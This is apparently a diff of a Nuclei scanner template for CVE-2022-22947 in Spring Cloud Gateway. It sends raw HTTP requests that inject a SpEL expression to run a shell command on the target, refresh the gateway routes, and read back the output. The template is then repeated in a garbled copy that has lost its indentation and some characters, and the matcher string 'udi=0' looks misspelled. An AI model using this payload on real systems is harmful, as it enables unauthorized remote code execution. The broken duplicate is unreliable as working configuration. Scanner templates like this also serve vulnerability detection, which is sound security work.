0xSojalSec · July 13, 2022 14:36
diff --git a/CVE-2022-22947.yaml b/CVE-2022-22947.yaml
 id: CVE-2022-22947

 info:
  name: CVE-2022-22947
  author: 0x240x23elu
  severity: critical
  description: Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
  reference:
    - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947
  tags: cve,cve2022,rce,spring

 requests:
  - raw:
      - |
        POST /actuator/gateway/routes/hacktest HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
        Connection: close
        Content-Type: application/json
        Content-Length: 329

        {
          "id": "hacktest",
          "filters": [{
            "name": "AddResponseHeader",
            "args": {
              "name": "Result",
              "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
            }
          }],
          "uri": "http://example.com"
        }

      - |		
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 0

      - |
        GET /actuator/gateway/routes/hacktest HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 0

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "udi=0"
          - "(root)"
          - "groups"
          - "hacktest"
	id: CVE-2022-22947

	info:
	name: CVE-2022-22947
	author: 0x240x23elu
	severity: critical
	description: Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
	reference:
	- https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947
	tags: cve,cve2022,rce,spring

	requests:
	- raw:
	- \|
	POST /actuator/gateway/routes/hacktest HTTP/1.1
	Host: {{Hostname}}
	Accept-Encoding: gzip, deflate
	Accept: /
	Accept-Language: en
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
	Connection: close
	Content-Type: application/json
	Content-Length: 329

	{
	"id": "hacktest",
	"filters": [{
	"name": "AddResponseHeader",
	"args": {
	"name": "Result",
	"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
	}
	}],
	"uri": "http://example.com"
	}

	- \|
	POST /actuator/gateway/refresh HTTP/1.1
	Host: {{Hostname}}
	Accept-Encoding: gzip, deflate
	Accept: /
	Accept-Language: en
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
	Connection: close
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 0

	- \|
	GET /actuator/gateway/routes/hacktest HTTP/1.1
	Host: {{Hostname}}
	Accept-Encoding: gzip, deflate
	Accept: /
	Accept-Language: en
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
	Connection: close
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 0

	matchers-condition: and
	matchers:
	- type: word
	part: body
	words:
	- "udi=0"
	- "(root)"
	- "groups"
	- "hacktest"